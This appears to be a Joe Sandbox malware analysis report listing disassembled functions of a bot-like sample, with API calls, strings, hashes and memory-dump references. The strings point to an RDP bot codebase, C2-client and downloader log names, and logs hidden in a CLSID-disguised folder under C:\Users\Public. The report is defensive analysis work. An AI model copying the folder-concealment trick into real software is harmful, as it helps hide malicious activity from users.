Opcode Fuzzy Hash: 4b024a6b28ce2b07e7a2910d768eb0d7eedf76f45639da4cab46353fdb6778d0
Instruction Fuzzy Hash: 89415261E08E47DDFA508B53E9413F86361BB24364F4442F2D96E666B1DF3CE58AC348

Function 00007FFE0E134CA0 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0E134D8C

Strings

ini_get_var, xrefs: 00007FFE0E134CE9, 00007FFE0E134D1C, 00007FFE0E134D4F, 00007FFE0E134DB6, 00007FFE0E134DFE
(sec != NULL), xrefs: 00007FFE0E134CE2
(var != NULL), xrefs: 00007FFE0E134D48
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E134CDB, 00007FFE0E134D0E, 00007FFE0E134D41
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE0E134DBD
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE0E134E05
NULL, xrefs: 00007FFE0E134E1E, 00007FFE0E134E27
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E134CF0, 00007FFE0E134D23, 00007FFE0E134D56
(name != NULL), xrefs: 00007FFE0E134D15

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 29ebf32fd85aaa6c302b57af4e383905eb192d8d050791926176978d225b6fbe
Instruction ID: 8604748a448cd595410404db1d366194200e4ff7e4883eae85a86e5e62998328
Opcode Fuzzy Hash: 29ebf32fd85aaa6c302b57af4e383905eb192d8d050791926176978d225b6fbe
Instruction Fuzzy Hash: B64129A1A08B47A6FA609B20E8403F87361FF54358F844137EAED462B5DF7CE95AC300

Function 00007FFE126D8250 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE126D833C

Strings

(name != NULL), xrefs: 00007FFE126D82C5
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE126D836D
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE126D828B, 00007FFE126D82BE, 00007FFE126D82F1
(var != NULL), xrefs: 00007FFE126D82F8
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE126D83B5
(sec != NULL), xrefs: 00007FFE126D8292
NULL, xrefs: 00007FFE126D83CE, 00007FFE126D83D7
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126D82A0, 00007FFE126D82D3, 00007FFE126D8306
ini_get_var, xrefs: 00007FFE126D8299, 00007FFE126D82CC, 00007FFE126D82FF, 00007FFE126D8366, 00007FFE126D83AE

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 4413dc6e3f6250dd8d36c19e406b8351c08953a7a009de5be6584f3d82e10626
Instruction ID: 0126deb30bc5419d33dc8af7b8e3208ea347b01a3f764507b121263f46423eb8
Opcode Fuzzy Hash: 4413dc6e3f6250dd8d36c19e406b8351c08953a7a009de5be6584f3d82e10626
Instruction Fuzzy Hash: 37411C61A08E4FD7FA1ACF52AD447F82360AB44768F4544B2DA8C461F1EFBCE946C300

Function 00007FFE0E16D300 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0E16D3EC

Strings

(name != NULL), xrefs: 00007FFE0E16D375
NULL, xrefs: 00007FFE0E16D47E, 00007FFE0E16D487
ini_get_var, xrefs: 00007FFE0E16D349, 00007FFE0E16D37C, 00007FFE0E16D3AF, 00007FFE0E16D416, 00007FFE0E16D45E
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE0E16D41D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16D350, 00007FFE0E16D383, 00007FFE0E16D3B6
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE0E16D465
(sec != NULL), xrefs: 00007FFE0E16D342
(var != NULL), xrefs: 00007FFE0E16D3A8
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E16D33B, 00007FFE0E16D36E, 00007FFE0E16D3A1

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: baa5269c21e4732f51f4d8c06ff15b0a280de119eeecf7f346a5e47aac46175b
Instruction ID: 336ff204e5507505f3e6cd685262a7ca2dcc8f74fc797f1affa4d6c93779b46e
Opcode Fuzzy Hash: baa5269c21e4732f51f4d8c06ff15b0a280de119eeecf7f346a5e47aac46175b
Instruction Fuzzy Hash: 49413CA1F0864791FA609F41E8403F8A360BF48B48F854137EADD566B6DF7CE986C380

Function 00007FFE133816D9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE133817CD

Strings

[D] (%s) -> Done(name=%s), xrefs: 00007FFE133817ED
(ini != NULL), xrefs: 00007FFE1338171B
ini_get_sec, xrefs: 00007FFE13381722, 00007FFE13381755, 00007FFE13381788, 00007FFE133817E6, 00007FFE13381824
NULL, xrefs: 00007FFE13381844
(sec != NULL), xrefs: 00007FFE13381781
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE13381714, 00007FFE13381747, 00007FFE1338177A
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE1338182B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13381729, 00007FFE1338175C, 00007FFE1338178F
(name != NULL), xrefs: 00007FFE1338174E

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: cc754a487619ba4d3fe55a8fff3b75e044976832e5e2ad57f523f8373a74ed8a
Instruction ID: 454238818a535c7967d7896f574b9c709fe8f6020af679da726525fa4d402685
Opcode Fuzzy Hash: cc754a487619ba4d3fe55a8fff3b75e044976832e5e2ad57f523f8373a74ed8a
Instruction Fuzzy Hash: 40416365E08E47DDFA508B13E9017B86261BF303A8F4446F6E96E269B1DF3DE585C308

Function 00007FFE0E134B19 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0E134C0D

Strings

(sec != NULL), xrefs: 00007FFE0E134BC1
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE0E134C6B
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E134B54, 00007FFE0E134B87, 00007FFE0E134BBA
[D] (%s) -> Done(name=%s), xrefs: 00007FFE0E134C2D
ini_get_sec, xrefs: 00007FFE0E134B62, 00007FFE0E134B95, 00007FFE0E134BC8, 00007FFE0E134C26, 00007FFE0E134C64
NULL, xrefs: 00007FFE0E134C84
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E134B69, 00007FFE0E134B9C, 00007FFE0E134BCF
(ini != NULL), xrefs: 00007FFE0E134B5B
(name != NULL), xrefs: 00007FFE0E134B8E

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: b0ace65d0544e08878f1069df199fb0ae34c20e66282c48064816a280043140a
Instruction ID: a5ae48e7a6bd06b8a5f1e041c2207d86c09161e37369ee7a79178cd943417a91
Opcode Fuzzy Hash: b0ace65d0544e08878f1069df199fb0ae34c20e66282c48064816a280043140a
Instruction Fuzzy Hash: 50412CA1A0C64796FB609B60E9407F87261FF50388F884037DAED5A6B5DF7CE989C300

Function 00007FFE126D80C9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE126D81BD

Strings

(name != NULL), xrefs: 00007FFE126D813E
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE126D821B
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE126D8104, 00007FFE126D8137, 00007FFE126D816A
[D] (%s) -> Done(name=%s), xrefs: 00007FFE126D81DD
(sec != NULL), xrefs: 00007FFE126D8171
(ini != NULL), xrefs: 00007FFE126D810B
NULL, xrefs: 00007FFE126D8234
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126D8119, 00007FFE126D814C, 00007FFE126D817F
ini_get_sec, xrefs: 00007FFE126D8112, 00007FFE126D8145, 00007FFE126D8178, 00007FFE126D81D6, 00007FFE126D8214

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: fd83ec08a632a1a5050c5c11268c840856166cd656e16e484ef7c1645f6c2824
Instruction ID: 5b8a3e544a1f576df1d119d0b6be61aa97049ab4321f1be0c37476f4a019fca7
Opcode Fuzzy Hash: fd83ec08a632a1a5050c5c11268c840856166cd656e16e484ef7c1645f6c2824
Instruction Fuzzy Hash: 38414DA1A08E8FD6FA16DF43ED447B42250BB54768F4440B2DA8C061F1EFBCE98AC340

Function 00007FFE0E16D179 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE0E16D26D

Strings

(name != NULL), xrefs: 00007FFE0E16D1EE
NULL, xrefs: 00007FFE0E16D2E4
[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FFE0E16D2CB
(ini != NULL), xrefs: 00007FFE0E16D1BB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16D1C9, 00007FFE0E16D1FC, 00007FFE0E16D22F
[D] (%s) -> Done(name=%s), xrefs: 00007FFE0E16D28D
(sec != NULL), xrefs: 00007FFE0E16D221
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E16D1B4, 00007FFE0E16D1E7, 00007FFE0E16D21A
ini_get_sec, xrefs: 00007FFE0E16D1C2, 00007FFE0E16D1F5, 00007FFE0E16D228, 00007FFE0E16D286, 00007FFE0E16D2C4

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: strcmp
String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
API String ID: 1004003707-386092548
Opcode ID: 551c19bd1324a9293b0d9cfbcd7f4f82ae8a189173a1b29672ef480067d49603
Instruction ID: fa0cfde12ae4a77c873c58f2a7c791d506db84f9661bc29fbee91fee7dc7f18b
Opcode Fuzzy Hash: 551c19bd1324a9293b0d9cfbcd7f4f82ae8a189173a1b29672ef480067d49603
Instruction Fuzzy Hash: 48413BA1B0864791FA20AF50F8403B4A260BF58B88F49413BDEDD1A5B6DF7CE985C380

Function 00007FF6EF6513CD Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 76stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6EF6513D8
strlen.MSVCRT ref: 00007FF6EF6513F4
strlen.MSVCRT ref: 00007FF6EF651400
strlen.MSVCRT ref: 00007FF6EF65148A
strlen.MSVCRT ref: 00007FF6EF6514B7

Strings

update.p, xrefs: 00007FF6EF651409
.applied, xrefs: 00007FF6EF651492
pkg, xrefs: 00007FF6EF651416
????-pat, xrefs: 00007FF6EF65144A
tch.pkg, xrefs: 00007FF6EF651457

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: strlen
String ID: .applied$????-pat$pkg$tch.pkg$update.p
API String ID: 39653677-1686225151
Opcode ID: c173e9b1be122b58ee2805fee9d2ea4c3f3e24ec3b5cd1edd9f56f5051aea604
Instruction ID: 5f6e538590bdf0321e182ff3d233c711ad33a60027e0731a8b9319bfb006f54b
Opcode Fuzzy Hash: c173e9b1be122b58ee2805fee9d2ea4c3f3e24ec3b5cd1edd9f56f5051aea604
Instruction Fuzzy Hash: 4F21D71390CB4743FB215A25991437D17AA4B15BC8F444830DE4EEB793DE2EA854E347

Function 00007FFE13382072 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE1338211E
fflush.MSVCRT ref: 00007FFE1338212A
EnterCriticalSection.KERNEL32 ref: 00007FFE13382143
LeaveCriticalSection.KERNEL32 ref: 00007FFE1338216B
CopyFileA.KERNEL32 ref: 00007FFE133821C8

Strings

., xrefs: 00007FFE133821AD
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log, xrefs: 00007FFE1338218B
1, xrefs: 00007FFE133821B2

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log
API String ID: 513531256-1680544107
Opcode ID: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
Instruction ID: 95c8480718dffb3bbdb36f89bd843c493f71d2301b455718d700e08c5d62dd0b
Opcode Fuzzy Hash: 15fcd58cd3eb7583ee134ce5694752740e5871d12bbf076c924059a10169c031
Instruction Fuzzy Hash: B4418621A0CE41CDF3209B17E8543BE2752ABE47A0F5001B1DA1EA7BB5CF3CE5858748

Function 00007FFE126D77A2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE126D784E
fflush.MSVCRT ref: 00007FFE126D785A
EnterCriticalSection.KERNEL32 ref: 00007FFE126D7873
LeaveCriticalSection.KERNEL32 ref: 00007FFE126D789B
CopyFileA.KERNEL32 ref: 00007FFE126D78F8

Strings

., xrefs: 00007FFE126D78DD
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log, xrefs: 00007FFE126D78BB
1, xrefs: 00007FFE126D78E2

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log
API String ID: 513531256-3034662401
Opcode ID: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
Instruction ID: cd175909b749c0c38ab7b4a89dd9f0dae7cb71a1a218ebebd723514efd664a48
Opcode Fuzzy Hash: 9f3f7f722e393e0358d797796164f5cf8014935580b0725990df9a1c9f2d7994
Instruction Fuzzy Hash: DD41AE31A0CA858AF724EB16EC603BA2265BBA47A0F8000B1DA4D477F5CFBCE585C740

Function 00007FFE11EC1352 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE11EC13FE
fflush.MSVCRT ref: 00007FFE11EC140A
EnterCriticalSection.KERNEL32 ref: 00007FFE11EC1423
LeaveCriticalSection.KERNEL32 ref: 00007FFE11EC144B
CopyFileA.KERNEL32 ref: 00007FFE11EC14A8

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log, xrefs: 00007FFE11EC146B
1, xrefs: 00007FFE11EC1492
., xrefs: 00007FFE11EC148D

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log
API String ID: 513531256-2729875187
Opcode ID: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
Instruction ID: 331f7ba6cc26a9b60c45bbaac6f03a49b64eb4456062d19f5c30327131bd19bc
Opcode Fuzzy Hash: e9e9dd4bf963f1553131da972aa11efafee84aa59e09e2d57e94b69456d74635
Instruction Fuzzy Hash: 7C41B131A0CE4186FB209BA3EC543BB6398FB857A4F8450B5DA4D477B6EF2CE5418700

Function 00007FFE0EB49DC2 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE0EB49E6E
fflush.MSVCRT ref: 00007FFE0EB49E7A
EnterCriticalSection.KERNEL32 ref: 00007FFE0EB49E93
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB49EBB
CopyFileA.KERNEL32 ref: 00007FFE0EB49F18

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log, xrefs: 00007FFE0EB49EDB
., xrefs: 00007FFE0EB49EFD
1, xrefs: 00007FFE0EB49F02

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log
API String ID: 513531256-2601447032
Opcode ID: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
Instruction ID: 755df28770a11242a1c4dbff40cb9c1ac55f5f244fed5c69711d22be7a28fc14
Opcode Fuzzy Hash: 8a32dd43e7cb6b0607ee505daca8f6ab7bb6e5ec61a53d347284f3871c123f46
Instruction Fuzzy Hash: FA414C62A0878286F730EF55E8507BAA662FB88780F444035DA8D877B6CF3DE585CF00

Function 00007FFE126D8600 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE126D869A
_errno.MSVCRT ref: 00007FFE126D86B8
_errno.MSVCRT ref: 00007FFE126D86C4

Strings

(value != NULL), xrefs: 00007FFE126D8672
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE126D866B
[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE126D86EB
ini_get_uint32, xrefs: 00007FFE126D8679, 00007FFE126D86E4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126D8680

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

